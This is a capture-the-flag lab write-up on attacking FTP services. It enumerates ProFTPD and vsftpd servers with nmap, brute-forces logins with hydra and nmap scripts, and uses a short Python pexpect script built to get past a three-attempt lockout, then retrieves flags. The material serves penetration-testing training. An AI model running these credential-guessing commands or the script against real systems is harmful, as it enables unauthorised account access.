FTP
(File Transfer Protocol) - a client-server protocol used to transfer files between a network using TCP/UDP connections.
It requires a command channel and a data channel.
Default FTP port is 21
, opened when FTP is activated for sharing data.
sudo nmap -p21 -sV -sC -O <TARGET_IP>
- Target IP:
192.217.238.3
- Enumeration of ProFTP server
ip -br -c a
eth1@if170718 UP 192.217.238.2/24
- Target IP is
192.217.238.3
nmap 192.217.238.3
21/tcp open ftp
nmap -p21 -sV -O 192.217.238.3
21/tcp open ftp ProFTPD 1.3.5a
[...]
Service Info: OS: Unix
📌 FTP server version is
ProFTPD 1.3.5a
.
- Try
anonymous:anonymous
login
ftp 192.217.238.3
# anonymous login failed
- Use
hydra
with some users/passwords word lists to check if any credentials work with the ftp server
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.217.238.3 -t 4 ftp
[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.217.238.3:21/
[21][ftp] host: 192.217.238.3 login: sysadmin password: 654321
[21][ftp] host: 192.217.238.3 login: rooty password: qwerty
[21][ftp] host: 192.217.238.3 login: demo password: butterfly
[21][ftp] host: 192.217.238.3 login: auditor password: chocolate
[21][ftp] host: 192.217.238.3 login: anon password: purple
[21][ftp] host: 192.217.238.3 login: administrator password: tweety
[21][ftp] host: 192.217.238.3 login: diag password: tigger
1 of 1 target successfully completed, 7 valid passwords found
📌 Found credentials are:
sysadmin:654321
rooty:qwerty
demo:butterfly
auditor:chocolate
anon:purple
administrator:tweety
diag:tigger
- Use nmap ftp-brute script to find the
sysadmin
's password
echo "sysadmin" > users
nmap --script ftp-brute --script-args userdb=/root/users -p21 192.217.238.3
21/tcp open ftp
| ftp-brute:
| Accounts:
| sysadmin:654321 - Valid credentials
|_ Statistics: Performed 23 guesses in 6 seconds, average tps: 3.8
- Extract the 7 flags hidden on the server by logging in to the
ftp
server with each found user
ftp 192.217.238.3
ftp> ls
ftp> get secret.txt
ftp> exit
root@attackdefense:~# cat secret.txt
Reveal Flag - sysadmin flag is: 🚩
260ca9dd8a4577fc00b7bd5810298076
Reveal Flag - rooty flag is: 🚩
e529a9cea4a728eb9c5828b13b22844c
Reveal Flag - demo flag is: 🚩
d6a6bc0db10694a2d90e3a69648f3a03
Reveal Flag - auditor flag is: 🚩
098f6bcd4621d373cade4e832627b4f6
Reveal Flag - anon flag is: 🚩
1bc29b36f623ba82aaf6724fd3b16718
Reveal Flag - administrator flag is: 🚩
21232f297a57a5a743894a0e4a801fc3
Reveal Flag - diag flag is: 🚩
12a032ce9179c32a6c7ab397b9d871fa
- Target IP:
192.119.169.3
- Enumeration of vsftpd server
ip -br -c a
eth1@if170803 UP 192.119.169.2/24
- Target IP is
192.119.169.3
nmap 192.119.169.3
21/tcp open ftp
nmap -p21 -sV -O 192.119.169.3
21/tcp open ftp vsftpd 3.0.3
📌 FTP server version
vsftpd 3.0.3
- Use nmap ftp-anon script to check
anonymous
user login
nmap --script ftp-anon -p21 192.119.169.3
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Dec 18 2018 flag
|_drwxr-xr-x 2 ftp ftp 4096 Dec 18 2018 pub
📌 Anonymous FTP login allowed
ftp 192.119.169.3
# Use anonymous:anonymous to login
Name (192.119.169.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
ftp> get flag
ftp> exit
root@attackdefense:~# cat flag
Reveal Flag: 🚩
4267bdfbff77d7c2635e4572519a8b9c
🔬 VSFTPD Recon: Dictionary Attack
- Target IP:
192.14.30.3
- Dicotionary attack on
vsftpd
server- FTP server terminates the session after 3 attemps
ip -br -c a
eth1@if170888 UP 192.14.30.2/24
- Target IP is
192.14.30.3
nmap 192.14.30.3
21/tcp open ftp
nmap -p21 -sV -O 192.14.30.3
21/tcp open ftp vsftpd 3.0.3
echo "billy" > users
nmap --script ftp-brute --script-args userdb=/root/users -p21 192.14.30.3
21/tcp open ftp
| ftp-brute:
| Accounts:
| billy:carlos - Valid credentials
|_ Statistics: Performed 78 guesses in 55 seconds, average tps: 1.5
📌 billy's password is
carlos
- A custom script to attemp the logins is required if automated dictionary attack do not work, since the server terminates the sessions after 3 login attempts.
e.g.
python script:
nano billy.py
import pexpect
import sys
username=sys.argv[2]
password_dict=sys.argv[3]
# Loading the password dictionary and Striping \n
lines = [line.rstrip('\n') for line in open(password_dict)]
itr = 0
# Iterating over dictionary
for password in lines:
child = pexpect.spawn ('ftp '+sys.argv[1])
child.expect ('Name .*: ')
child.sendline (username)
print "Trying with password: ",password
child.expect ('Password:')
child.sendline (password)
i = child.expect (['Login successful', 'Login failed'])
if i==1:
#print('Login failed')
child.kill(0)
elif i==0:
print "Login Successful for ",password
print child.before
break
python billy.py 192.14.30.3 billy /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Login Successful for carlos
- Fetch the flag using
billy:carlos
credentials
ftp 192.14.30.3
ftp> ls
ftp> get flag
ftp> exit
root@attackdefense:~# cat flag
Reveal Flag: 🚩
c07c7a9be16f43bb473ed7b604295c0b